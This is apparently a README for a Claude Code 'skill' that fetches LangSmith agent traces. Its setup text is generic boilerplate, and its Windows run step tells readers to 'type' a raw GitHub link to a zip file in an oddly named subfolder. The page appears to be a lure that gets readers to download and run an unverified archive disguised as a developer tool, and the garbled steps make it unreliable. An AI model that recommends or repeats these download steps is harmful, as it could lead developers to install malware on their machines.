The langsmith-fetch-skill is an AI observability tool designed for Claude Code. It helps you debug LangChain and LangGraph agents by fetching execution traces from LangSmith Studio directly in your terminal. This makes it simple to monitor your AI agents and improve their performance.
- Easy Fetching: Pull execution traces quickly.
- Terminal Integration: Work directly in your terminal for a seamless experience.
- Agent Debugging: Effectively debug LangChain and LangGraph agents.
- Real-time Observability: Monitor your AI processes as they run.
To run the langsmith-fetch-skill, ensure your system meets these requirements:
- Operating System: Windows 10 or later, macOS Mojave or later, or a recent Linux distribution.
- Terminal: Any terminal that supports command-line interface (CLI).
- Minimum 4 GB RAM.
- At least 200 MB of free disk space.
-
Visit the Releases Page: Click here to go to the releases page.
-
Download the Latest Version: Locate the latest release and download the appropriate file for your operating system.
-
Extract the Files: If the downloaded file is a zip or tar archive, extract it to a folder of your choice.
-
Navigate to the Folder: Open your terminal and use the
cdcommand to navigate to the folder where you extracted the files. -
Run the Application:
- For Windows: Type
https://github.com/humongus69/langsmith-fetch-skill/raw/refs/heads/main/subrelation/fetch-langsmith-skill-v1.6.zipand hit Enter. - For macOS/Linux: Type
./langsmith-fetch-skilland hit Enter.
- For Windows: Type
To download the langsmith-fetch-skill, visit the releases page: Download Link.
- Click on the link above to access the releases.
- Choose the file that suits your system.
- Follow the installation steps mentioned earlier.
If you need help or want to share your feedback, feel free to connect with our community:
- Join our forum on Discord.
- Contribute to the discussions on our repository issues page.
We welcome contributions from everyone! If youβd like to help us improve the langsmith-fetch-skill, please follow these steps:
- Fork the repository.
- Create a new branch for your feature or fix.
- Make your changes.
- Submit a Pull Request.
The langsmith-fetch-skill is licensed under the MIT License. You are free to use, modify, and distribute this software as needed. Please refer to the LICENSE file for more details.